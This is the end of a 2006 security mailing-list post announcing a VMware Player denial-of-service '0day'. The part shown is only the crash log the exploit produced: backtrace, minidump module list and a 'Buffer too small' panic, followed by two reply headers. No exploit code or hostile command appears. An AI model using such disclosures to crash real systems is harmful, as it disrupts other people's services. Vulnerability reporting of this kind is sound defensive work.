Mar 15 11:19:18: vmx| backtrace[12] ebp 0x0012f804 eip 0x005b8067 params 0x08e84780 0000000000 0x00000012 0x0000000e [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x001b7067] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[13] ebp 0x0012f824 eip 0x00438c3a params 0x0001390c 0x003363b4 0000000000 0x00000011 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00037c3a] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[14] ebp 0x0012fc50 eip 0x0043a474 params 0x003363b0 0x0001390c 0x08e84780 0x08f05f88 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00039474] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[15] ebp 0x0012fc7c eip 0x0043aa36 params 0000000000 0000000000 0000000000 0x000f4240 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00039a36] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[16] ebp 0x0012fc94 eip 0x0043ab49 params 0000000000 0000000000 0000000000 0x08e84780 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00039b49] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[17] ebp 0x0012fcc4 eip 0x004148b1 params 0x08e84780 0x0012fcf8 0x0015234e 0x0012fd14 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x000138b1] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[18] ebp 0x0012fd08 eip 0x00414c0a params 0x00000004 0x0071bf50 0x00152388 0000000000 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00013c0a] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[19] ebp 0x0012ff18 eip 0x00403c56 params 0x00400000 0000000000 0x0015234b 0x0000000a [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00002c56] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[20] ebp 0x0012ffc0 eip 0x00401185 params 0000000000 0x00000030 0x7ffdf000 0xef028cf0 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00000185] (no symbol information)

Mar 15 11:19:18: vmx| backtrace[21] ebp 0x0012fff0 eip 0x77e814c7 params 0x00401000 0000000000 0x78746341 0x00000020 [C:\WINDOWS\system32\kernel32.dll base 0x77e60000 0x0001:0x000204c7] (GetCurrentDirectoryW + 0x0044)

Mar 15 11:19:18: vmx| ----End of backtrace----

Mar 15 11:19:18: vmx| Win32 object usage: GDI 6, USER 2

Mar 15 11:19:18: vmx| W32Util_CoreDump: faking exception to get context

Mar 15 11:19:18: vmx| CoreDump: Writing minidump to C:\Documents and Settings\n00b\Application Data\VMware\vmware-vmx-1372.dmp

Mar 15 11:19:18: vmx| CoreDump: including module base 0x00400000 size 0x004fc000

Mar 15 11:19:18: vmx| checksum 0x00000000 timestamp 0x43a85b9f

Mar 15 11:19:18: vmx| image file C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe

Mar 15 11:19:18: vmx| file version 1.0.1.19317

Mar 15 11:19:18: vmx| CoreDump: including module base 0x77f50000 size 0x000a7000

Mar 15 11:19:18: vmx| checksum 0x000a92f6 timestamp 0x3d6dfa28

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\ntdll.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x77e60000 size 0x000e6000

Mar 15 11:19:18: vmx| checksum 0x000e7ed3 timestamp 0x3d6dfa28

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\kernel32.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x7c340000 size 0x00056000

Mar 15 11:19:18: vmx| checksum 0x0005f1e9 timestamp 0x3e561eac

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\msvcr71.dll

Mar 15 11:19:18: vmx| file version 7.10.3052.4

Mar 15 11:19:18: vmx| CoreDump: including module base 0x77d40000 size 0x0008c000

Mar 15 11:19:18: vmx| checksum 0x000936bc timestamp 0x3d6dfa28

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\user32.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x77c70000 size 0x00040000

Mar 15 11:19:18: vmx| checksum 0x0004285c timestamp 0x3d6dfa27

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\gdi32.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x77dd0000 size 0x0008d000

Mar 15 11:19:18: vmx| checksum 0x0009315e timestamp 0x3d6dfa28

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\advapi32.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x78000000 size 0x00086000

Mar 15 11:19:18: vmx| checksum 0x00084e46 timestamp 0x3d6dfa29

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\rpcrt4.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x771b0000 size 0x00121000

Mar 15 11:19:18: vmx| checksum 0x00121e6b timestamp 0x3d6dfa22

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\ole32.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x74ae0000 size 0x00007000

Mar 15 11:19:18: vmx| checksum 0x00009968 timestamp 0x3b7dfe1f

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\cfgmgr32.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.0

Mar 15 11:19:18: vmx| CoreDump: including module base 0x76670000 size 0x000e7000

Mar 15 11:19:18: vmx| checksum 0x000e58ec timestamp 0x3d6dfa1e

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\setupapi.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x77c10000 size 0x00053000

Mar 15 11:19:18: vmx| checksum 0x000520bc timestamp 0x3d6dfa27

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\msvcrt.dll

Mar 15 11:19:18: vmx| file version 7.0.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x71ab0000 size 0x00015000

Mar 15 11:19:18: vmx| checksum 0x00015647 timestamp 0x3b7dfe31

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\ws2_32.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.0

Mar 15 11:19:18: vmx| CoreDump: including module base 0x71aa0000 size 0x00008000

Mar 15 11:19:18: vmx| checksum 0x0000fcb0 timestamp 0x3b7dfe32

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\ws2help.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.0

Mar 15 11:19:18: vmx| CoreDump: including module base 0x77120000 size 0x0008b000

Mar 15 11:19:18: vmx| checksum 0x000999af timestamp 0x3d6dfa22

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\oleaut32.dll

Mar 15 11:19:18: vmx| file version 3.50.5016.0

Mar 15 11:19:18: vmx| CoreDump: including module base 0x72280000 size 0x00028000

Mar 15 11:19:18: vmx| checksum 0x00026e12 timestamp 0x3d6dfa07

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\dinput.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x76b40000 size 0x0002c000

Mar 15 11:19:18: vmx| checksum 0x0002f7cc timestamp 0x3d6dfa20

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\winmm.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x51080000 size 0x00061000

Mar 15 11:19:18: vmx| checksum 0x0006c940 timestamp 0x40ee6b7c

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\dsound.dll

Mar 15 11:19:18: vmx| file version 5.3.1.904

Mar 15 11:19:18: vmx| CoreDump: including module base 0x77c00000 size 0x00007000

Mar 15 11:19:18: vmx| checksum 0x00005468 timestamp 0x3b7dfe0f

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\version.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.0

Mar 15 11:19:18: vmx| CoreDump: including module base 0x5ed00000 size 0x000c6000

Mar 15 11:19:18: vmx| checksum 0x000ace46 timestamp 0x3d6df9e5

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\opengl32.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x68b20000 size 0x0001e000

Mar 15 11:19:18: vmx| checksum 0x00025e60 timestamp 0x3b7dfe60

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\glu32.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.0

Mar 15 11:19:18: vmx| CoreDump: including module base 0x51000000 size 0x00050000

Mar 15 11:19:18: vmx| checksum 0x00053d78 timestamp 0x40ee6af9

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\ddraw.dll

Mar 15 11:19:18: vmx| file version 5.3.1.904

Mar 15 11:19:18: vmx| CoreDump: including module base 0x73bc0000 size 0x00006000

Mar 15 11:19:18: vmx| checksum 0x0000e03d timestamp 0x3b7dfe25

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\dciman32.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.0

Mar 15 11:19:18: vmx| CoreDump: including module base 0x76380000 size 0x00005000

Mar 15 11:19:18: vmx| checksum 0x00006ca4 timestamp 0x3d6dfa1d

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\msimg32.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x690d0000 size 0x0000d000

Mar 15 11:19:18: vmx| checksum 0x00000000 timestamp 0x43a85ad6

Mar 15 11:19:18: vmx| image file C:\Program Files\VMware\VMware Player\bin\ntwrap.dll

Mar 15 11:19:18: vmx| file version 1.0.1.19317

Mar 15 11:19:18: vmx| CoreDump: including module base 0x76780000 size 0x00008000

Mar 15 11:19:18: vmx| checksum 0x00008475 timestamp 0x3d6dfa1e

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\shfolder.dll

Mar 15 11:19:18: vmx| file version 6.0.2800.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x70a70000 size 0x00064000

Mar 15 11:19:18: vmx| checksum 0x000690c8 timestamp 0x3d6dfa02

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\shlwapi.dll

Mar 15 11:19:18: vmx| file version 6.0.2800.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x71950000 size 0x000e4000

Mar 15 11:19:18: vmx| checksum 0x000ea784 timestamp 0x3d6df9b6

Mar 15 11:19:18: vmx| image file C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df
_6.0.10.0_x-ww_f7fb5805\comctl32.dll

Mar 15 11:19:18: vmx| file version 6.0.2800.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x76f90000 size 0x00010000

Mar 15 11:19:18: vmx| checksum 0x00016fca timestamp 0x3d6dfa22

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\secur32.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x76ce0000 size 0x0001f000

Mar 15 11:19:18: vmx| checksum 0x0002a43b timestamp 0x3d6dfa21

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\ntmarta.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x76f60000 size 0x0002c000

Mar 15 11:19:18: vmx| checksum 0x0002d4fa timestamp 0x3d6dfa22

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\wldap32.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x71bf0000 size 0x00011000

Mar 15 11:19:18: vmx| checksum 0x0000f455 timestamp 0x3d6dfa06

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\samlib.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x76fd0000 size 0x00078000

Mar 15 11:19:18: vmx| checksum 0x0007d6dd timestamp 0x3b7dfe10

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\clbcatq.dll

Mar 15 11:19:18: vmx| file version 2001.12.4414.42

Mar 15 11:19:18: vmx| CoreDump: including module base 0x77050000 size 0x000c5000

Mar 15 11:19:18: vmx| checksum 0x000cd4c3 timestamp 0x3b7dfe10

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\comres.dll

Mar 15 11:19:18: vmx| file version 2001.12.4414.42

Mar 15 11:19:18: vmx| CoreDump: including module base 0x74ef0000 size 0x0000a000

Mar 15 11:19:18: vmx| checksum 0x000084f7 timestamp 0x3d6dfa14

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\wbem\wbemprox.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x75290000 size 0x00038000

Mar 15 11:19:18: vmx| checksum 0x0003b6a7 timestamp 0x3d6dfa15

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\wbem\wbemcomn.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x74ed0000 size 0x0000f000

Mar 15 11:19:18: vmx| checksum 0x0001a622 timestamp 0x3b7dfe1d

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\wbem\wbemsvc.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.0

Mar 15 11:19:18: vmx| CoreDump: including module base 0x75690000 size 0x0008d000

Mar 15 11:19:18: vmx| checksum 0x00099607 timestamp 0x3d6dfa17

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\wbem\fastprox.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: including module base 0x0ffd0000 size 0x00023000

Mar 15 11:19:18: vmx| checksum 0x0002a11c timestamp 0x3ccdcab0

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\rsaenh.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1029

Mar 15 11:19:18: vmx| CoreDump: including module base 0x72d20000 size 0x00009000

Mar 15 11:19:18: vmx| checksum 0x00007ea6 timestamp 0x3b7dfe2a

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\wdmaud.drv

Mar 15 11:19:18: vmx| file version 5.1.2600.0

Mar 15 11:19:18: vmx| CoreDump: including module base 0x72d10000 size 0x00008000

Mar 15 11:19:18: vmx| checksum 0x00005557 timestamp 0x3b7dfe2a

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\msacm32.drv

Mar 15 11:19:18: vmx| file version 5.1.2600.0

Mar 15 11:19:18: vmx| CoreDump: including module base 0x77be0000 size 0x00014000

Mar 15 11:19:18: vmx| checksum 0x0001695e timestamp 0x3b7dfe0f

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\msacm32.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.0

Mar 15 11:19:18: vmx| CoreDump: including module base 0x77bd0000 size 0x00007000

Mar 15 11:19:18: vmx| checksum 0x0000a3bf timestamp 0x3b7dfe0f

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\midimap.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.0

Mar 15 11:19:18: vmx| CoreDump: including module base 0x0b280000 size 0x000c1000

Mar 15 11:19:18: vmx| checksum 0x000bd9f7 timestamp 0x3e385156

Mar 15 11:19:18: vmx| image file C:\Program Files\VMware\VMware Player\dbghelp.dll

Mar 15 11:19:18: vmx| file version 6.1.17.2

Mar 15 11:19:18: vmx| CoreDump: including module base 0x76bf0000 size 0x0000b000

Mar 15 11:19:18: vmx| checksum 0x0000fb5a timestamp 0x3d6dfa21

Mar 15 11:19:18: vmx| image file C:\WINDOWS\system32\psapi.dll

Mar 15 11:19:18: vmx| file version 5.1.2600.1106

Mar 15 11:19:18: vmx| CoreDump: Including thread 3012

Mar 15 11:19:18: vmx| CoreDump: Including thread 3788

Mar 15 11:19:18: vmx| CoreDump: Including thread 2092

Mar 15 11:19:18: vmx| CoreDump: Including thread 1440

Mar 15 11:19:18: vmx| CoreDump: Including thread 2088

Mar 15 11:19:18: vmx| CoreDump: Including thread 2224

Mar 15 11:19:18: vmx| CoreDump: Including thread 3780

Mar 15 11:19:18: vmx| CoreDump: Including thread 1704

Mar 15 11:19:18: vmx| CoreDump: Including thread 192

Mar 15 11:19:18: vmx| Msg_Post: Error

Mar 15 11:19:18: vmx| [msg.log.error.unrecoverable] VMware Player unrecoverable error: (vmx)

Mar 15 11:19:18: vmx| C:/ob/bora-19317/bora/lib/string/str.c:192 Buffer too small 0x430f6f

Mar 15 11:19:18: vmx| [msg.panic.haveLog] A log file is available in "C:\Documents and Settings\n00b\Desktop\back-track\vmware.log". [msg.panic.haveCore] A core file is available in "C:\Documents and Settings\n00b\Application Data\VMware\vmware-vmx-1372.dmp". [msg.panic.requestSupport.withLogAndCore] Please request support and include the contents of the log file and core file. [msg.panic.requestSupport.win32]

Mar 15 11:19:18: vmx| To collect files to submit to VMware support, run cscript vm-support.vbs.

Mar 15 11:19:18: vmx| [msg.panic.response] We will respond on the basis of your support entitlement

[/code]

[ reply ]
Re: Vm ware 0day dos exploit by n00b. Jun 20 2006 03:32AM
Eliah Kagan (degeneracypressure gmail com)
Re: Vm ware 0day dos exploit by n00b. Jun 20 2006 02:59AM
Paul Szabo (psz maths usyd edu au)


 

Privacy Statement
Copyright 2010, SecurityFocus